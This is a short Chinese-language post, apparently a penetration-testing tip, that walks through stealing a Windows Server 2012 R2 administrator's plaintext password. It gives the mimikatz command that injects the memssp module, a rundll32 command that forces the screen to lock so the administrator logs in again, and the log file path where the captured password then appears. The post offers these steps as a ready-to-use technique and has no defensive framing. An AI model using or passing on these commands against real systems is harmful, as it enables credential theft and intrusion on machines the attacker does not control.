Windows Server 2012 R2已经修复了以前从内存获取密码的漏洞,并且IPC$的远程认证方式也改变了,导致没办法进行hash注入,因为默认不存储LM hash ,也只能抓取NTLM hash ,基本上也是很难破解成功的。


mimikatz.exe privilege::debug misc::memssp exit

当看到Injected =)的时候,表明已经注入成功,此时,我们等待管理员再次登录(锁屏、注销或重启均可)。

接下来就是使对方的屏幕锁屏,终端键入rundll32.exe user32.dll,LockWorkStation命令。

在管理员再次输入密码登录时,明文密码会记录在C:\Windows\System32\mimilsa.log文件

共有 0 条评论